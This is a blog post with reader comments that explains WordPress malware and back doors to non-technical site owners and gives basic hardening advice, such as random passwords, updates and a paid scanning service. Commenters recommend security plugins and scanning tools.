Do any of the following scenarios sound familiar to you? If so, I think we can eliminate the fear and maybe even the entire spectacle!
“1. My readers have let me know that when they click on linkhere.com they get a message saying I have a virus. What can I do?”
“2. [I've sent them a notice that our monitoring partner has alerted us to a problem and we're dealing with it.] What’s wrong? Does this mean I have a virus?!?!”
“3. Google has blasted my site with the big red warning screen – I’m panicking!! What do I do?”
“4. How can this happen!?!?”
WordPress Security vs. The Bad Guys
Imagine a huge plate of spaghetti noodles piled high on a serving platter. For our illustration that will represent the internet.
“Malware” is simply anything that does harm to your particular noodle.
Malware is not looking for your noodle in particular. It is simply looking for any website, on any computer that might have left the door open a crack for it to get in and do damage. And you’re right – there are no doors in noodles. The analogy breaks down a bit here.
My point is that it isn’t personal – this is not a targeted attack destined to do you damage, although it can feel like it.
Is WordPress Secure?
In other words, is it WordPress’s fault that you have had this trouble?
Let me post a hypothetical question: What are the chances of my reputation being ruined by a past indiscretion?
The answer is not much! And not because I’ve been angelic, but because no one cares!
What about the Prime Minister? (er… or President, I think you call him.) More people care about his reputation, than they do about mine so I’ve been told.
To summarize, if you are popular more people care and somehow find it entertaining or challenging to find juicy bits. The same is true for WordPress – it is insanely popular. So there are those silly people who find it somehow entertaining to challenge the security of it.
On the flipside, because it is so huge, and because WordPress is ‘open source’, it’s backed by 100′s of developers and 1,000′s of contributors all making it better and more secure by the day.
Literally – by the day. It’s mind-boggling.
So is it secure? I see it like a race. Just as fast as the evil minions can come up with malware, WordPress is fighting to become impenetrable. And yes, I’m betting on WordPress and a few best practices.
Don’t stop reading now!
Back Doors: escaping unscathed
Have you seen the movies with the teenage boy climbing out the top floor window of his girlfriend’s bedroom? It’s dark. A twig snaps. Shortly after, Daddy comes out the front door with a shot gun? We route for the fellow to escape unharmed and true love to prevail. I always picture this scenario when talking about Back Doors. Except we’re not letting an unsung hero escape our bedroom window, we’re letting a virus out and leaving an opening for him later.
Back doors – these are the pieces of code that leave little holes for the malware to come back later. Its essential you get these out of your website too.
Best Practices for WordPress Security
Items for your geeky brother/sister/husband/wife: Make sure your computer is secure (use anti-virus software, use 2 if possible). Make sure your network is secure (use a firewall).
Items for you: Passwords need to be changed and random: admin users, FTP users, MYSQL users.
Make sure all your passwords are randomly generated.
SB: You know that I have over 1,000 passwords that you’ve given me, right? When ‘they’ say that people use passwords like their names, children’s names, birthdays, and words like “adm1n” and “passw0rd” they are RIGHT!
Items you might want help with: Make sure your WordPress, Plugins, and Themes are all updated and from reputable sources (use as few as possible). See our WordPress Upgrade Page for details.
78% of malware cases can be attributed to outdated WordPress, or plugin/modules! (source)
#1 Tip for WordPress Security
Get your website on these guys’ automatic scanners. They clean out and harden sites. Install the server-side monitoring and the WordPress plugin that comes in the dashboard after logging in. Proudly display the ‘secured by Sucuri’ badge in your footer to increase reader confidence.
I used to charge by the hour to manually clean out sites. This can be an arduous process and an unexpected $200 – $300 bill! Sucuri’s annual(yes – thats annual) charge of $90 is a STEAL.
Further reading:
- the Codex
- Sucuri Blog
Great post, I’m glad there are people blogging about Malware and Injections through WordPress in order to get the word out. WordPress, out of the box, really isn’t secure. However that doesn’t mean that you shouldn’t be using it.
I personally love building in WordPress because of the amount of people we can reach with our services, like many others. WordPress is a huge community – however with that being said there are a large percentage of users that unfortunately do not have any security or know what to do when being attacked.
Sucuri is great for cleaning out malware and infectious servers. $90 is very inexpensive once you’re infected, however just the pain of having to deal with hiring someone can be nerve wrecking.
We’ve come out (about to launch in a day) a great WordPress Security plugin that can prevent a lot of hackers and bots from taking over someone’s site. We all know there are many preventative measures that we can take to protect our sites, but many users simply don’t know or can’t afford to hire someone to do this for them.
Being able to change your database table prefix on the fly, change your admin username, create a custom login URL (that disables the default wp-admin & wp-login.php URL’s), enable HTTP Authentication and so much more.
You can get more info at http:// lockerpress.com
Thank you for your comment! the link has been removed. but we can copy/paste it! I’ll look into your lockerpress plugin – sounds good!
Great post… and a good list of things to do to secure your wordpress…
We had some issues ourselves on our sites, and in the end we compiled an extensive checklist of items you need to do to secure your wordpress site…
It should be good for relatively non-technical wordpress users too…
And it can be downloaded for free from our site http://www. wpsecuritychecklist.com
Maybe your readers can benefit from the checklist too…
Thank you for the checklist – I’ll definitely check that out!
I have WP site owners come to us frequently. As your source states, most of these are due to outdated WP installations.
A major issue is plugins. I have see several plugins that include other code. While the plugin author may update their code, they do not update the include code. This was certainly the case with the Timthumb hack (http://www. wpbeginner .com /wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/).
One tip I offer here (http: //www.rackaid .com/ resources/wordpress-tips/) is to pick popular plugins that are updated regularly. Don’t use obscure plugins that do not have regular updates. Doing this and keeping your WP up to date will save a lot of trouble.
If you have multiple WP installs, check out http:// www. managewp.com/
Lastly, I am experimenting with WPScan – a WP specific security scanner – and will post results to our blog.
I think:
- Running WP under mod_ruid, fast-cgi, SuPHP to assure the WP install runs under the user ID
- Using good passwords
- Keeping things updated
- WPscans regularly or after any plugin/coding/theme changes
- W3TC for performance
These list really lays a great foundation for a operating WP.
Thank you – the additional things – wpscans (we use managewp for all our clients, and Sucuri has a server side plugin that I recommend now). The links have been removed, but we’ll copy/paste them!